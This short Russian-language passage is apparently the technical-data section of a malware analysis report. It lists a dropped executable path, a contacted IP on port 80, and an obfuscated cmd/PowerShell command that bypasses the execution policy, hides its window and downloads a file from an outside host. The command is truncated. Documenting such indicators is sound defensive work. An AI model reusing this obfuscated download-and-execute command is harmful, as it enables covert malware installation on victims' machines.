Техническая информация
- http://86.##6.131.141/1.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^ERS^HeLL.e^xe -^e^xe^cUtI^onpolIc^y ^BYp^A^S^S -^No^Pro^F^iL^E^ -WI^N^DOWSTY^LE h^idd^e^N^ (^NE^W-o^bjec^T^ s^Y^stE^M.N^et.^w^ebCLient).^doWNloAdf^Il^E('http://86.##6.131...
- '86.##6.131.141':80
- '<SYSTEM32>\cmd.exe' /C "pOW^ERS^HeLL.e^xe -^e^xe^cUtI^onpolIc^y ^BYp^A^S^S -^No^Pro^F^iL^E^ -WI^N^DOWSTY^LE h^idd^e^N^ (^NE^W-o^bjec^T^ s^Y^stE^M.N^et.^w^ebCLient).^doWNloAdf^Il^E('http://86.##6.131... (со скрытым окном)